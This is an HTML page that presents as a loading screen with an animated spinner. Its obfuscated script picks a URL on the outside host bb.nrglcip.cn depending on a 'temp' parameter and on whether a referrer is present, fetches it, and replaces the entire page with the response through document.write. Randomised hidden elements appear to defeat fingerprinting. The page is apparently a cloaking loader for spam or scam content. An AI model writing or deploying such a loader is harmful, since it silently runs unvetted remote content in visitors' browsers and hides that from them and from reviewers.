<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ewzB6tzefR {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ewzB6tzefR .uK6YOP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ewzB6tzefR .content {
            line-height: 50px;
            text-align: center
        }

        .ewzB6tzefR .img {
            width: 100%
        }

        .ewzB6tzefR .Xeaf01jm {
            text-align: center
        }

        .ewzB6tzefR .Xeaf01jm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ewzB6tzefR .Xeaf01jm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ewzB6tzefR .Xeaf01jm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ewzB6tzefR .Xeaf01jm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ewzB6tzefR .Xeaf01jm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ewzB6tzefR .Xeaf01jm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ewzB6tzefR .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fKbykY3ktp5Yu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UNPDn = fKbykY3ktp5Yu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UNPDn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UNPDn +".html?a=share";
		}
		
        TneNcd=url+"#"+new Date().getTime();
        TneNcd && function() {
            $.get(TneNcd, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >SQBXRvF3ggRdVpbkqf1bXJ2usYO6kxSWubcwsOw8l1hQVjYYUjimhmSG</li>
<p  style='display:none'>N2ZxhIvI1fY6z1r3DwwUzLz2yz184Vxp2m4GYdWoIIz0</p>
<img  src='' style='display:none'>
<p  style='display:none'>N2ZxhIvI1fY6z1r3DwwUzLz2yz184Vxp2m4GYdWoIIz0</p>
<img  src='' style='display:none'>
<div style='display:none'>Fp4j3Zx93zYAV0L8Z9pVNJx8etKthPe7</div>
<div style='display:none'>Fp4j3Zx93zYAV0L8Z9pVNJx8etKthPe7</div>
<p  style='display:none'>N2ZxhIvI1fY6z1r3DwwUzLz2yz184Vxp2m4GYdWoIIz0</p><div class="ewzB6tzefR">
    <div class="uK6YOP">
        <div class="Xeaf01jm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>lWRu6FUQYVq4oAt13yOFlncc6h586qyvSKO0tnsw90dm5Oz5rq34ow5m3wN5PreZc7o2jSzRE1l</p>
<img  src='' style='display:none'>
<p  style='display:none'>lWRu6FUQYVq4oAt13yOFlncc6h586qyvSKO0tnsw90dm5Oz5rq34ow5m3wN5PreZc7o2jSzRE1l</p>
<h1 style='display:none' >V6mBD3OpVp2PZSY9gMi2uMeb9iynYbSh</h1>
<span style='display:none'>pYf4ltIKJDIND2HcFHH6eHgdTlpMVkUG7vXhxFuNDbpUCqona7UnBuI9UYwKOYg</span>
<a  href='#' style='display:none'>fzaCnv01OluW98AudD5RdkyNbfVGVoxO8QwzIJvccuPKJw388sXygUL4HdYM7q4vP</a>
<h1 style='display:none' >V6mBD3OpVp2PZSY9gMi2uMeb9iynYbSh</h1>
<ul style='display:none' >oBmvmNMaB3k0T8jc</ul>
<div style='display:none'>LVm8spMRq8Uin6VjIjBhHFlrB4aUrIG6YJDfLCpXcawCoGpvMwBz0acVXI</div>
<ul style='display:none' >oBmvmNMaB3k0T8jc</ul></body>
</html>